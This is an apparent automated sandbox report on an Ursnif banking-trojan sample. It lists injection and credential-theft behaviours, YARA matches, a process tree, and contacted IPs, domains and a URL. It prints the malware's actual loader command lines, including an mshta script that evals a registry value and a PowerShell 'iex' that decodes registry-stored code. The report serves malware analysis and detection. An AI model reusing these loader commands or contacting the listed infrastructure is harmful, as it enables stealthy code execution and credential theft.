Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\regsvr32.exe Thread register set: target process: 6968
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3292
Source: C:\Windows\explorer.exe Thread register set: target process: 3088
Source: C:\Windows\explorer.exe Thread register set: target process: 3756
Source: C:\Windows\explorer.exe Thread register set: target process: 4396
Source: C:\Windows\explorer.exe Thread register set: target process: 5804
Source: C:\Windows\explorer.exe Thread register set: target process: 6208
Source: C:\Windows\System32\control.exe Thread register set: target process: 3292
Source: C:\Windows\System32\control.exe Thread register set: target process: 7012
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7172F12E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: CF2000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFFAE131580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 2FC0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFFAE131580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: B48A8F9000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26754260000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 943186B000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2433E7D0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFFAE131580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF7FDC65FD0
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 24E31E50000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF7FDC65FD0
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESBA2B.tmp' 'c:\Users\user\AppData\Local\Temp\q3xypckz\CSC358FCCDF4025435CA355D903053645.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESC8D1.tmp' 'c:\Users\user\AppData\Local\Temp\chv50z53\CSCD671F0735D74415BB6A373562E60C48B.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Source: explorer.exe, 0000001E.00000000.420488752.0000000001400000.00000002.00000001.sdmp Binary or memory string: uProgram Manager
Source: explorer.exe, 0000001E.00000000.433237497.0000000005F40000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001E.00000000.420488752.0000000001400000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000001E.00000002.512108234.0000000000EB8000.00000004.00000020.sdmp Binary or memory string: ProgmanX
Source: explorer.exe, 0000001E.00000000.420488752.0000000001400000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000001E.00000000.437180572.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndAj

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A85F3A cpuid 1_2_04A85F3A
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A86204 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 1_2_04A86204
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A85F3A RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 1_2_04A85F3A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A83C98 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 1_2_04A83C98
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.261787991.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261868993.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261831474.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261898772.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261995232.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.446420368.0000024E31FF5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.365991031.000000000532C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.423867966.0000000002940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261930125.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.515638073.0000024340635000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.445169971.0000024E32160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261629754.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261360311.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.432292653.000002090C820000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.482163983.0000000002910000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.519882408.0000026754D05000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6968, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 4360, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4760, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
Source: C:\Windows\explorer.exe File opened: C:\Users\user\appdata\local\google\chrome\user data\default\login data
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000003
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Tries to steal Mail credentials (via file access)
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.261787991.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261868993.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261831474.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261898772.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261995232.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.446420368.0000024E31FF5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.365991031.000000000532C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.423867966.0000000002940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261930125.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.515638073.0000024340635000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.445169971.0000024E32160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261629754.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261360311.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.432292653.000002090C820000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.482163983.0000000002910000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.519882408.0000026754D05000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6968, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 4360, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4760, type: MEMORY
Behavior Graph (ID: 322748, Sample: vnaSKDMnLG, Startdate: 25/11/2020, Architecture: WINDOWS, Score: 100)

Process tree, dropped files, network contacts and signatures, rebuilt from the graph edges:

Start (vnaSKDMnLG)
  DNS: resolver1.opendns.com
  Signatures: Found malware configuration; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 10 other signatures
  mshta.exe (started)
    Signatures: Suspicious powershell command line found
    powershell.exe (started)
      Dropped: C:\Users\user\AppData\...\q3xypckz.cmdline (UTF-8); C:\Users\user\AppData\Local\...\chv50z53.0.cs (UTF-8)
      Signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); 2 other signatures
      explorer.exe (injected)
        Network: 63.250.47.200, 49771, 80 NAMECHEAP-NETUS United States; 162.0.213.229, 443, 49776, 49778 ACPCA Canada
        Signatures: Tries to steal Mail credentials (via file access); Changes memory attributes in foreign processes to executable or writable; Tries to harvest and steal browser information (history, passwords, etc); 3 other signatures
        cmd.exe (started)
          conhost.exe (started)
        2 other processes
      csc.exe (started)
        Dropped: C:\Users\user\AppData\Local\...\q3xypckz.dll (PE32)
        cvtres.exe (started)
      csc.exe (started)
        Dropped: C:\Users\user\AppData\Local\...\chv50z53.dll (PE32)
        cvtres.exe (started)
      conhost.exe (started)
  loaddll32.exe (started)
    regsvr32.exe (started)
      Signatures: Maps a DLL or memory area into another process; Writes or reads registry keys via WMI; Writes registry values via WMI; Creates a COM Internet Explorer object
      control.exe (started)
        Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Modifies the context of a thread in another process (thread injection)
        rundll32.exe (started)
      WerFault.exe (started)
    cmd.exe (started)
      iexplore.exe (started)
        Network: 192.168.2.1 unknown unknown
        iexplore.exe (started)
          Network: img.img-taboola.com; edge.gycpi.b.yahoodns.net 87.248.118.23, 443, 49744, 49745 YAHOO-DEBDE United Kingdom; 9 other IPs or domains
        iexplore.exe (started)
          Network: assets.onestore.ms; consentdeliveryfd.azurefd.net; ajax.aspnetcdn.com
        iexplore.exe (started)
          Network: groovcerl.xyz 162.0.213.230, 49765, 49766, 49767 ACPCA Canada
        3 other processes

Contacted Public IPs

IP              Domain   Country         ASN     ASN Name         Malicious
87.248.118.23   unknown  United Kingdom  203220  YAHOO-DEBDE      false
63.250.47.200   unknown  United States   22612   NAMECHEAP-NETUS  false
162.0.213.229   unknown  Canada          35893   ACPCA            false
151.101.1.44    unknown  United States   54113   FASTLYUS         false
162.0.213.230   unknown  Canada          35893   ACPCA            false

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
contextual.media.net 104.80.21.70 true
tls13.taboola.map.fastly.net 151.101.1.44 true
hblg.media.net 104.80.21.70 true
lg3.media.net 104.80.21.70 true
groovcerl.xyz 162.0.213.230 true
resolver1.opendns.com 208.67.222.222 true
edge.gycpi.b.yahoodns.net 87.248.118.23 true
www.msn.com unknown unknown
srtb.msn.com unknown unknown
assets.onestore.ms unknown unknown
img.img-taboola.com unknown unknown
ajax.aspnetcdn.com unknown unknown
s.yimg.com unknown unknown
web.vortex.data.msn.com unknown unknown
cvision.media.net unknown unknown

Contacted URLs

Name: http://groovcerl.xyz/images/_2B9CjQr1xAViB33KLEZFl/2znYpePgiBaym/Zcv7ASeM/RH1S7KGYN6l8JiGWg4e9nXb/NQZq1SSxJi/mc5yp3cGYcmh41_2B/sgGwdOmEGgkx/5KQWfRKKgWK/Xt2u1awqIScbRf/sgOFy4dR5ErSJgERDDH7r/_2FEWj4i_2BFzqwq/_2BgPzFAK8qrY4B/dRdOEARjck/1iLUKWQnn/K.avi
  Malicious: false
  Antivirus Detection: Avira URL Cloud: safe
  Reputation: unknown